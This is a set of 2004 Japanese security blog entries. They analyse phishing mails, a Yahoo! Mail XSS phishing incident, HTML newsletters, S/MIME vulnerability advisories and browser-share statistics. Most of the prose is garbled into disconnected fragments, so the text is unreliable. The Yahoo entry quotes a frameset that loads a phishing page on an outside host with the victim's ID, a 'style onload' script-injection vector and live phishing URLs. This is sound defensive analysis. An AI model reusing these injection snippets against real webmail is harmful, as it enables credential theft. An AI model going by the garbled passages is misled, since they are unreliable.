最新 追記

高木浩光@自宅の日記

目次 はじめに 連絡先:blog@takagi-hiromitsu.jp
訪問者数 本日: 3606   昨日: 2393

2004年12月04日

Becky! 2.12で何が改善されたか




 Becky! Internet Mail Version 2.12 1117



Becky! Internet Mailv2.12, , 20041117  




Becky!




Ver2.11.02 -> Ver2.12

HTML

HTML

 Becky! Internet Mail Version 2, Readme  




Becky! 2.11.02HTMLHTML Becky! URL

HTML

図1: フィッシングメールをBecky! 2.11.02で表示した様子

ここで「Register」と書かれたリンクをクリックすると、次のようにリンク先 のページが表示される。

図2: Becky! 2.11.02でHTMLメールのリンク先にジャンプした様子


Becky! *1

https://  使 *2

Outlook ExpressInternet Explorer IE Outlook ExpressURL 使 Becky! 2.11.02*3

IPABecky!9

Becky! 2.12Web URL*4

図3: Becky! 2.12でリンクのアンカーにマウスポインタを乗せたときの様子

消費者にセキュリティを説くHTMLメールマガジンの偽善




NTT 

HTMLHTML

図4: 直接入力情報を送信させるHTMLメールマガジン


*5

614HTML HTML

!?

OK



? , NTT, 2004527  
!? , NTT, 2004810  
OK, NTT, 20041028  







!! 5 


66 Web 使






Becky! Internet Mail使  







coden.ntt.com  HTML

 Becky! Internet Mail使, NTT  

図5: HTMLの添付ファイルをマイコンピュータゾーン で開けと指示している様子
「Becky! Internet Mail」をご使用の方へ設定のお願い」より


.exe .bat.vbs.pif.scr

.htm.html HTML *6

HTML

*7

10




Windows XP SP2  







Microsoft Windows XP Service Pack 2Windows XP SP2

Microsoft Windows XP Service Pack 2Windows XP SP2Outlook Express

 Microsoft Windows XP Service Pack 2Windows XP SP2, NTT  







Web使  








Web使 使




 







WebWeb IDURL

 
<img src='http://go.ab0.jp/go.php?aid=0L5Ry-0pSQP'></body></html>


WebNTT Web

cookie




Cookies

CookiesNTT 便

 NTT   




Cookiescookie

cookie使 使

便

 !? 







1 メールの送信者が信頼できる会社のメールアドレスなら、内容を信用してよい。
×
[2] メールの見た目のデザインがきちんとした作りなら、内容を信用してよい。
×
[3] メールの見た目のデザインが自分の購読しているメールマガジンのものと同じ なら、内容を信用してよい。
×
[4] 電子署名されていないメールで、HTMLメールに入力欄や送信ボタンがあっても、 送信先がどこかわからないうちは押してはいけない。
×
[5] メールの内容が緊急に何かせよと言っているときはフィッシング詐欺の疑いが あるが、このメールマガジンのような内容なら、 詐欺の疑いはないので安心してリンク先にジャンプしてよい。

×
[6] HTMLメールマガジンの多くには見えない画像が仕掛けられていて、 誰がいつそれを読んだかの情報が送信されている。
×
[7] HTMLメールを閲覧しただけで、自分のメールアドレスが実在することを迷惑メー ル業者に知られてしまうことがある。
×
  8 Windows XP SP2 HTML  
×
[9] 信用できないメールの「.vbs」や「.pif」などの拡張子の添付ファイルを開く とウイルスに感染することがあるのと違って、htmlの添付ファイルを開くのは、 画像ファイルを開くのと同じで安全である。
×




HTML *8

*1 

*2 

*3 Becky! HTML 使

*4 

*5 HTML

*6 11 Becky! 2.12

*7  Becky! 2.11.02 Becky!

*8 S/MIME

2004年12月05日

ヤフーからの通知を装った日本語フィッシングで何が起きていたか




15Web Yahoo! Mail XSS使





1Yahoo! Mail Yahoo! Mail Subject:TEST Subject:From:  
From: "Yahoo! JAPAN " <wallet-help@yahoo.co.jp>
Subject: Yahoo! JAPAN - 有料コンテンツご利用停止に関するお知らせ

図1: ヤフーのWebメールに送られていたフィッシングメールのコピー

ここで、矢印部分にあるリンク「Yahoo!ウォレット登録情報の確認・変更」を クリックしたところ、図2の画面が現れた。

図2: クリックすると現れた偽のログイン画面


 

URLjp.f25.mail.yahoo.co.jp ID  takagi_hiromistu 

調 URL

 
http://yahoo-com-jp.mine.nu:1649/jp/...




Windows XP SP2Internet Explorer使

yahoo.co.jp HTML

 
<frameset row="*">
<frame src="http://yahoo-com-jp.mine.nu:1649/(略)&user=takagi_hiromitsu">
</frameset>


1 jp.f25.mail.yahoo.co.jp

JavaScript

JavaScriptHTML

 
document.write('<frameset row="*"> ...');


*1

HTMLJavaScript Webcookie JavaScriptcookie Web JavaScript VBScript

HotmailYahoo! Mail1999 XSS



HotmailYahoo Mail, CNET Japan,  2004324  


HotmailYahooHTMLDagon

 

HotmailYahoo! Mail , memo, 2004324  
Vulnerability Note VU#707100: Multiple web-based email services fail to filter malicious characters when the message contains cascading style sheet character escaping, memo, 20031212  
MSHotmail, memo, 20031016

......


Yet another Hotmail security hole - injecting JavaScript using "j&#x41;vascript:", memo, 2000118  
Hotmail 3, memo, 200017  
HotmailJavaScript, memo, 1999916  


使 JavaScript

 
<style onload="スクリプト文"></style>


onload

調 yahoo.com Web

1516 Yahoo! 16Yahoo!



2 3

図3: 間違ったパスワードを入力するとエラーとなる様子


10ID10 11 4

図4: 正しいパスワードを入れることで「ログイン」できた様子

こうした挙動を示したのは、偽サイトが、入力されたパスワードを本物サイト に中継送信して、パスワードが本物かどうかを確認する仕掛けになっていたと しか考えられない。

何気なくパスワードを間違えたりして、このような挙動を見た人は、正しいパ スワードを入れたとき、本物サイトにログインしている錯覚に陥るだろう。

暗証番号(セキュリティキー)には何を入れても通過するようだったが、 この後現れる画面は、図5のようになっており、 すっかり本物サイトにログインしていると錯覚した人は、疑いもなく、 これらの情報を入力してしまうのだろう。

図5: カード番号などの情報を入力させようとしている画面

図2〜4の画面は、本物のヤフーのサイトに実在する画面とそっくりだが、図5 のように、カードの暗証番号(ATMでのキャッシングに使用するもの)を求め る画面は存在しないようだ。冷静に考えれば、そんな情報をWebに登録するの は変なのだが、ログインしていると錯覚していれば入れてしまうのだろう。

ちなみに、図4の画面をサブフレームだけ表示させたのが図6である。偽サイト のURLで動いていることがわかる。URLのパラメータ部分には、ユーザIDと、 入力したパスワード*2が渡されているのが見える。

図6: サブフレームの偽サイトだけを表示させた様子






Yahoo! JAPAN,  ITmedia , 20041116  


VISA WebHTML

Yahoo! JAPANJavaScript WebWeb  



Yahoo! JAPAN, INTERNET Watch, 20041117  


JavaScript Yahoo! JAPANURLWeb  



VISA,  IT Pro, 20041118  


JavaScript使 URL Yahoo! Japan Yahoo!



1115 使



 



XSS *3 IT ProITmedia ITmedia

Yahoo! Mailのフィッシング事例から得られる教訓






1115memo XSS memo

Google2Yahoo! 929

 
8:名無しさん(新規) :04/09/29 22:10:43 ID:fA+H10Jx
きたきた!!
題名:Yahoo! JAPAN -- 有料コンテ ンツご利用停止に関するお 知らせ
発信先:wallet-support@yahoo-inc.co.jp←これ自体おかしい
いつもYahoo! JAPANをご利用いただきありがとうございます。
このたび、お客様がご利用のYahoo! JAPAN 有料コンテンツのご利用 を停止させていただきましたことをご連絡いたします。 現在お客様がYahoo!ウォレットでYahoo!プレミアム会員費などのお支 払いにご利用中のクレジットカードにつきまして、カード発行会社よ り、弊社へご登録のクレジットカード情報では請求が行えないとの連 絡をいただきました。 そのため、ご利用になられていたYahoo!プレミアム会員費など、お支 払いが必要なサービスについてご利用停止処理を行わせていただきま した次第です。 なお、お客様にはご利用になられていた有料コンテンツを、再度ぜひ ご利用いただきたいと存じます。その際にはお手数ではございますが、 お客様のYahoo!ウォレット登録お支払い方法のご変更手続きをお願い いたします。 お客様のYahoo!ウォレットご登録内容の変更については、以下の確認 画面右側に表示されます「お支払い情報の変更」をクリックして表示 される画面よりお手続きいただけます。
とび先アドレスはここです。 http://yah-jp.ath.cx:1666/yahoo.co.jp/step1.php


930




Yahoo!Yahoo!  


930 XSS

1116 INTERNET Watch

XSS








E  






Yahoo! Mail



XSS


20002CERT/CCCA-2000-02 XSSSecurIT-Advisory 2001-001 cookie

cookie使









, IT Pro, 2004119  
SurfControl, INTERNET Watch, 2004119  
使, ITmedia , 20041111  






1011



Yahoo! Mail

使



Yahoo! JAPAN ID








URL

 _

 Yahoo! JAPAN ID,   


URL

URL

図7: ヤフーの頓珍漢な注意文







Yahoo! JAPANYahoo! JAPAN ID

URL

Yahoo! JAPAN

1

 Yahoo! JAPAN,   


URL




「メールで尋ねることはしていない」という一つ覚え








 - , MYCOM PCWeb, 2004111  


[]使

URLURL  

,  INTERNET Watch, 2004111




URL Web  





 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
タカギ ヒロミツ様  (takagi@mail1.accsnet.ne.jp)  から
送金がありました。
(No.20040921XXXXXXXXXXXX-XXX)
送金内容:送金のテスト 送金日時: 2004/09/21 XX:XX:XX ※送金の受取手続きは45日以内に行ってください。 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ (略) ▼▼ タカギ ヒロミツ様からの送金の受取手続きは                      下記URLを押してください ▼▼ http://merumane.ebank.co.jp/ebk/ebs?RECV=OK&ESCROW_NUM=20040921XXXXXXXXXXXX (以下略)




S/MIME

*1 ユーザID「takagi_hiromitsu」が、偽サイト のCGIへのパラメータとして渡されていたのも、JavaScriptを使って、メール 画面のHTMLから切り出して渡すようになっていた。もっとも、これは、 フィッシングメールをあて先ごとに内容を変えて送信すれば、 あて先のユーザIDをメール中に埋め込めるので、 XSS脆弱性がなかったとしても、ユーザIDが自動で現れることは起き得る。

*2 「flower」とあるのは、このとき臨時に付けた パスワード。

*3 証拠を得られなかったのかもしれない。 ヤフーが認めなければ書けないということなのだろう。


2004年12月10日

日本版Anti-Phishing Working Groupは誕生し得るのか?




 




930 XSS  


124311




124311 Re:  9/30-19:55




http://jp.f16.mail.yahoo.co.jp/ym/ShowLetter?
box=Inbox&MsgId=3539_134227_10325_794_
Yahoo!WALLET



 , , 124311  


930  http://jp.f16.mail.yahoo.co.jp/ym/ShowLetter?URL 1115

1



Anti-Phishing Working Group (APWG) IT

ATWGRecent Phishing Attacks

3




"Phishing attacks continue to increase both in number and in sophistication," said Dave Jevans, Chairman of the Anti-Phishing Working Group and a Senior Vice President at Tumbleweed Communications. "We are seeing more use of Java-script, pop-ups and cross-site scripting techniques to fool even sophisticated users of the Internet. The Anti-Phishing Working Group, with over 200 members, was founded as an industry resource to address this critical challenge to individuals and companies on the Internet. At stake is our very trust that the Internet can be relied upon for safe and secure commerce and communications."

 Anti-Phishing Working Group PRESS RELEASE, 19-Mar-2004  








APWG





Yahoo, ITmedia , 20041210  


1  



APWG


mod_rubyなしではcounter.rbが3万回/日程度のアクセスに耐えられない




12503 Service Temporarily Unavailable

12:0013:004,800*1 1

rubykill 22503 Service Temporarily Unavailablekillkill ruby

06:  349          18: 2616
07:  525          19: 2390
08: 1331          20: 2296
09: 2166          21: 2483
10: 2455          22: 3228
11: 2864          23: 3191
12: 4865          00: 2424
13: 3997          01: 1710
14: 2751          02:  901
15: 2615          03:  593
16: 2535          04:  320
17: 2752          05:  278

この日の1時間あたりのページビュー


tDiarycounter.rb counter.rbruby

counter.rbcache/counter/counter.dat counter.rb *2 PStore 232.7 MB

mod_ruby使使 counter.rb

counter.rbIP counter.dat  :0 32112

*1 「訪問者数」とは 数え方が異なる。「/diary/」と「/????????.html」へのアクセス数。

*2 cookieを受け入れない設定の閲覧者の場合に、同じIP アドレスからのアクセスを一定期間、重複カウントしない仕組みを実現するた め、IPアドレスと時刻が一時的に記憶されている。


2004年12月15日

ソニー銀行がアドレスバーとステータスバーを出すようになっていた






 調 1115



, , 20041115  


 



調

:



IT, 63, 2001926  


3.2 

4 JavaScript 

URL  SSL 

4URL 

55  



4 , , 212,  p.168, 20026  




 

, 144調, , 20035  




調 14432 181-C ID/

ID/  



phishing, IT Pro , 2004315  


Web

 

 () ,  2004823




調調1 2 3 使







使 調




    
 



3

2004年12月19日

このままではJVNは役に立たない




JPCERT/CC Vendor Status Notes (JVN) Vender Status Notes - JP  


JVN#E59B594B: S/MIME [2004/12/16 19:00]  




S/MIME10 1030




JVN#E59B594B  S/MIME*1  


JVN#E59B594B

 JVN#E59B594B




 16:00 2004/10/28
 19:00 2004/12/16  


101216





ベンダステータス更新日
サイトー企画該当製品あり2004/12/16







 JVN#E59B594B 

 2004/10/28
 2004/12/16
 :  JVN#E59B594B



URL
 http://hide.maruo.co.jp/software/tk.html


 http://hide.maruo.co.jp/software/tkhist.html


 http://hide.maruo.co.jp/software/tkparticular.html

 






IPA




 IPA#E59B594B 

11/10 JVN 2004/12/16 19:00  


*1

1110




1028JVN#E59B594B





-  v3.70  


memo1029




 3.71   3.70   3.71 

 memo - JVN#E59B594B S/MIME (JVN, 2004.10.28)  


 3.67beta3  3.70




[]S/MIME  


3.71




S/MIME  


JVNv3.70 

 3.71 1110




CACA  Version 3.71  










2 04/11/16 23:16

S/MIMEV3.68 S/MIME

× 

    S/MIME  







2004/12/16 V3.71 -> V4.00
* 
o
o S/MIME  


 4.00

 3.71 使S/MIME使 4.00  JVN#E59B594B





-  v3.70  




1110 3.71 JVN

JVN  

 



10JVN112



v3.69S/MIME, v3.71, , 2004112  


JP Vendor Status Notes1028 v3.69S/MIME 2 v3.71 使  



JVN

 v4.00 S/MIME



v4.00    , ,  20041217  


16v4.002

ZIP調

SubjectFrom2 



16 JVN

JVN



JVN

*1 こうしたメールは、IPAの脆弱性情報届出窓口に 製品の脆弱性を届け出ていた人に対して、その件がJVNで公表された際に送ら れてくる。


2004年12月21日

バージョン番号くらい書こうよ




 JVN#B4BE09A4





- Shuriken Pro3
- Shuriken Pro3 /R.2
- Shuriken Pro3 /R.2 [ ]
- Shuriken Pro3 Corporate Edition 

JVN#B4BE09A4:  Shuriken Pro3 S/MIME  




 *1

ジャストシステムの発表文は事実と異なる




 JVN#B4BE09A4






2 



Shuriken Pro3(*)  使 [ - ] 

 Shuriken Pro3S/MIME  


1127Shuriken Pro3  S/MIME3 使

11月27日の日記の図3の再掲


JVN#B4BE09A4

Shuriken Pro3 5.0.1.6 EmailAddress



Date: Wed, 10 Nov 2004 12:10:40 +0900
From: foo@example.com
To: takagi@mail1.accsnet.ne.jp
Subject: S/MIME
 =?ISO-2022-JP?B?GyRCRkg8KxsoQkNBGyRCSC85VBsoQiAbJEIlYRsoQg==?=
 =?ISO-2022-JP?B?GyRCITwlayUiJUklbCU5JEokNz5aTEA9cRsoQiA=?=
 =?ISO-2022-JP?B?GyRCJE4lRiU5JUgbKEI=?=
X-SMIME-Plugin: Becky! S/MIME Plug-in v1.0.0rc2 build at Aug 13 2002 21:52:41
Message-Id: <20041110121031.B81D.FOO@example.com>
MIME-Version: 1.0
X-Mailer: Becky! ver. 2.11.02 [ja]
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg="sha1"; boundary="===[S/MIME_RFC2311]===419186A7.31E220==="
Content-Transfer-Encoding: 7bit

--===[S/MIME_RFC2311]===419186A7.31E220===
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit

S/MIME署名のテスト

--===[S/MIME_RFC2311]===419186A7.31E220===
Content-Type: application/x-pkcs7-signature;
 name="smime.p7s"
Content-Disposition: attachment;
 filename="smime.p7s"
Content-Transfer-Encoding: base64

MIIE1QYJKoZIhvcNAQcCoIIExjCCBMICAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCA5IwggOOMIICdqADAgECAgEDMA0GCSqGSIb3DQEBBAUAMGAx
CzAJBgNVBAYTAkpQMRAwDgYDVQQIEwdJYmFyYWtpMRAwDgYDVQQHEwdUc3Vr
dWJhMRQwEgYDVQQKEwtOYW5kZW1vIEFyaTEXMBUGA1UEAxMOTmFuZGVtbyBB
cmkgQ0EwHhcNMDQxMTEwMDMwMzU4WhcNMDUxMTEwMDMwMzU4WjBPMQswCQYD
VQQGEwJKUDEQMA4GA1UECBMHSWJhcmFraTEUMBIGA1UEChMLTmFuZGVtbyBB
cmkxGDAWBgNVBAMUD2Zvb0BleGFtcGxlLmNvbTCBnzANBgkqhkiG9w0BAQEF
AAOBjQAwgYkCgYEAoaVR4FS2YAIDNfMQ/J1U4WITcjrojSH67buWoSTA7bcK
xz1k0NxoEHdtGMlNIsk1mC+hGGEOThfU28UEpL4abpH5L26at0LE01S3z8TD
Gc8kjWzY9YA5VGp2VWuqDAlXyvbMDvNWkEERYLsWa1Rtak7Yk48eRp+CSix4
depkacMCAwEAAaOB5zCB5DAJBgNVHRMEAjAAMCwGCWCGSAGG+EIBDQQfFh1P
cGVuU1NMIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQU/kFAV7lM
5frHBHfy15bFSPIVDCEwgYkGA1UdIwSBgTB/gBQxFSn6qdO2VZp/NfBCNnCb
p4nVvKFkpGIwYDELMAkGA1UEBhMCSlAxEDAOBgNVBAgTB0liYXJha2kxEDAO
BgNVBAcTB1RzdWt1YmExFDASBgNVBAoTC05hbmRlbW8gQXJpMRcwFQYDVQQD
Ew5OYW5kZW1vIEFyaSBDQYIBADANBgkqhkiG9w0BAQQFAAOCAQEANd6s8HeB
vZwTV0TRY8rrImEKtJCXCImf4hKFVedDQ0Keil4z6EFtu3fky83HqPc6NAuO
eYUpyCf4ciJb9sA0SLrntT46o/zyhfPx41JX8rjDkKwos5G/cObCpLdv7Msr
fwZc9Pmf/ZxqMtYxS4dCxu/trC7XgpHKp3ETOYn160cdnV/Gws1dMetOAXSu
oKW8HS4qkUKE4bddhhBSazjlCYOIKduKGIb+gzN0nfrk+p2uEaPqtbS56nhC
/Ag4AIjLzAC99NjzxmuRaE6+CUTSeTf3N12mtqv+aFtY5otOPBzpApfIUsWv
ul02Yt0Nd6D49dMadMlGOcPDQj/kt4wV6zGCAQswggEHAgEBMGUwYDELMAkG
A1UEBhMCSlAxEDAOBgNVBAgTB0liYXJha2kxEDAOBgNVBAcTB1RzdWt1YmEx
FDASBgNVBAoTC05hbmRlbW8gQXJpMRcwFQYDVQQDEw5OYW5kZW1vIEFyaSBD
QQIBAzAJBgUrDgMCGgUAMA0GCSqGSIb3DQEBAQUABIGAhWx8yvkvWJSn0hVb
c7FNIUjiiZuFLx+QgOfpCn5Fld0EtU0kek5FEvGFmuEjvdPFrL2qdZPhL4o7
+aLkmTd2+x7N1x7Lu7uG11USWTMpmn6H5HfFtxFpKM0Y1CdIbtx4qVSNnOBp
VJCd/qoJTT4fRdJPDDa9HKrQZn2rRPZyPzg=
--===[S/MIME_RFC2311]===419186A7.31E220===--

JVN#B410A83F 1127




5

*3 











3) 

S/MIME

Shuriken Pro3/R.2

使





4) 



2.  Windows

DNEEmailAddress

smime2.crt

3. 使S/MIME



6) 

S/MIME

Shuriken Pro3/R.2

 


 5.5.6.0

JVN#B410A83F 5.5.6.0 




 


*2

EmailAddress From5.5.6.0 




使  




5.5.6.0 

Outlook Express Microsoft

*1 「アップデートモジュールのダウンロードはこちら」と書かれたリンク先にある、 アップデートモジュールのページ(「公開日2003.04.18」のページ)には、 「バージョンが記載バージョン以降であれば、導入いただく必要はありません。 5.5.6.0 (2004.11.18更新)」といちおう書かれてはいるが、 ここは新しいアップデートモジュールが出るたびに書き換えられるところ なので、今回の脆弱性がいつのバージョン未満までに影響があるのか、 しばらくすると不明になってしまう。

*2 私が今回の脆弱性を届け出たのは、5.5.6.0のパッチリリースを知るより前だった。


2004年12月25日

Firefoxの普及状況は?




Firefox 使調

1/diary/  /diary/*.html  GET others

図1: この日記の閲覧時に使用されているブラウザの推移
  12/8125

使*1

#! /usr/local/bin/ruby
logformat = /^(\S*) (\S*) (\S*) \[(...........):(........) .....\]『(\S*) (\S*)
(\S*)』(\S*) (\S*) "([^"]*)" "([^"]*)"/
total = 0
msie = firefox = mozilla = netscape6 = opera = safari = w3m = netscape4 = antenn
a = others = 0
while line = gets()
    line.chomp!()
    (addr, user, auth, date, time, method, path, protocol, status, length, refer
rer, agent) = line.scan(logformat)[0]
    next if method != "GET"
    next if not path.match(/^\/diary\/$|^\/diary\/.*\.html$/)
    total += 1
    if agent.match(/Opera/)
        opera += 1
    elsif agent.match(/Firefox/)
        firefox += 1
    elsif agent.match(/Safari/)
        safari += 1
    elsif agent.match(/w3m/)
        w3m += 1
    elsif agent.match(/MSIE/)
        msie += 1
    elsif agent.match(/Netscape\/[67]/)
        netscape6 += 1
    elsif agent.match(/Mozilla\/4\.[6789]/)
        netscape4 += 1
    elsif agent.match(/Gecko\//)
        mozilla += 1
    elsif agent.downcase.match(/antenna|wdb|rss|samidare|livedoorcheckers|glucos
e|blogpeople/)
        antenna += 1
    else
        others += 1
    end
end
print "#{total} #{msie} #{firefox} #{mozilla} #{netscape6} #{opera} #{safari} #{
w3m} #{netscape4} #{antenna} #{others}\n"

*1 ご利用はご自由に。


最新 追記

最近のタイトル

2024年07月07日

2024年04月07日

2024年04月01日

2024年03月23日

2024年03月19日

2024年03月16日

2024年03月13日

2024年03月11日

2023年03月27日

2022年12月30日

2022年12月25日

2022年06月09日

2022年04月01日

2022年01月19日

2021年12月26日

2021年10月06日

2021年08月23日

2021年07月12日

2020年09月14日

2020年08月01日

2019年10月05日

2019年08月03日

2019年07月08日

2019年06月25日

2019年06月09日

2019年05月19日

2019年05月12日

2019年03月19日

2019年03月16日

2019年03月09日

2019年03月07日

2019年02月19日

2019年02月11日

2018年12月26日

2018年10月31日

2018年06月17日

2018年06月10日

2018年05月19日

2018年05月04日

2018年03月07日

2017年12月29日

2017年10月29日

2017年10月22日

2017年07月22日

2017年06月04日

2017年05月13日

2017年05月05日

2017年04月08日

2017年03月10日

2017年03月05日

2017年02月18日

2017年01月08日

2017年01月04日

2016年12月30日

2016年12月04日

2016年11月29日

2016年11月23日

2016年11月05日

2016年10月25日

2016年10月10日

2016年08月23日

2016年07月23日

2016年07月16日

2016年07月02日

2016年06月12日

2016年06月03日

2016年04月23日

2016年04月06日

2016年03月27日

2016年03月14日

2016年03月06日

2016年02月24日

2016年02月20日

2016年02月11日

2016年02月05日

2016年01月31日

2015年12月12日

2015年12月06日

2015年11月23日

2015年11月21日

2015年11月07日

2015年10月20日

2015年07月02日

2015年06月14日

2015年03月15日

2015年03月10日

2015年03月08日

2015年01月05日

2014年12月27日

2014年11月12日

2014年09月07日

2014年07月18日

2014年04月23日

2014年04月22日

2000|01|
2003|05|06|07|08|09|10|11|12|
2004|01|02|03|04|05|06|07|08|09|10|11|12|
2005|01|02|03|04|05|06|07|08|09|10|11|12|
2006|01|02|03|04|05|06|07|08|09|10|11|12|
2007|01|02|03|04|05|06|07|08|09|10|11|12|
2008|01|02|03|04|05|06|07|08|09|10|11|12|
2009|01|02|03|05|06|07|08|09|10|11|12|
2010|01|02|03|04|05|06|07|08|09|10|11|12|
2011|01|02|03|05|06|07|08|09|10|11|12|
2012|02|03|04|05|06|07|08|09|
2013|01|02|03|04|05|06|07|
2014|01|04|07|09|11|12|
2015|01|03|06|07|10|11|12|
2016|01|02|03|04|06|07|08|10|11|12|
2017|01|02|03|04|05|06|07|10|12|
2018|03|05|06|10|12|
2019|02|03|05|06|07|08|10|
2020|08|09|
2021|07|08|10|12|
2022|01|04|06|12|
2023|03|
2024|03|04|07|
最新 追記